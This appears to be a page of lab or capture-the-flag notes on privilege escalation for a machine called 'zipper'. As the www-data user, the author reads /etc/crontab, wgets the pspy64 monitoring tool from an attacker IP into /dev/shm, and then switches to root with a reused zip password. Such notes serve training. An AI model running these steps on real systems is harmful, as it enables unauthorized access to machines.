Priv Esc

www-data@zipper:/home$ cat /etc/crontab
www-data@zipper:/dev/shm$ wget 192.168.45.168/pspy
--2024-09-09 11:48:04--  http://192.168.45.168/pspy
Connecting to 192.168.45.168:80... connected.
HTTP request sent, awaiting response... 404 File not found
2024-09-09 11:48:04 ERROR 404: File not found.

www-data@zipper:/dev/shm$ wget 192.168.45.168/pspy64
--2024-09-09 11:48:08--  http://192.168.45.168/pspy64
Connecting to 192.168.45.168:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 3104768 (3.0M) [application/octet-stream]
Saving to: ‘pspy64’

pspy64              100%[===================>]   2.96M  6.36MB/s    in 0.5s    

2024-09-09 11:48:08 (6.36 MB/s) - ‘pspy64’ saved [3104768/3104768]

www-data@zipper:/dev/shm$ chmod +x pspy64

Ran pspy again

Nothing special about the backups so just tried to su as root with the zip password

PreviousEnumerationNextCredentials / Notes / LL

Last updated